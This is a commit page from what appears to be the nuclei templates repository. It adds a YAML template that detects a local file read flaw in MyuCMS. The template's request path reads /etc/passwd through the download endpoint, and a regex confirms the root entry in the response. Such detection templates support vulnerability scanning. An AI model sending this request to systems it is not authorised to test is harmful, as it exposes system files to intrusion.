Merge pull request #1242 from projectdiscovery/princechaddha-patch-11

Create myucms-lfr.yaml
patch-1
Prince Chaddha 2021-04-21 23:48:16 +05:30 committed by GitHub
commit 41b35fe99b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 0 deletions

View File

@ -0,0 +1,15 @@
id: myucms-lfr
info:
name: MyuCMS Local File Read
author: princechaddha
severity: high
tags: myucms,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"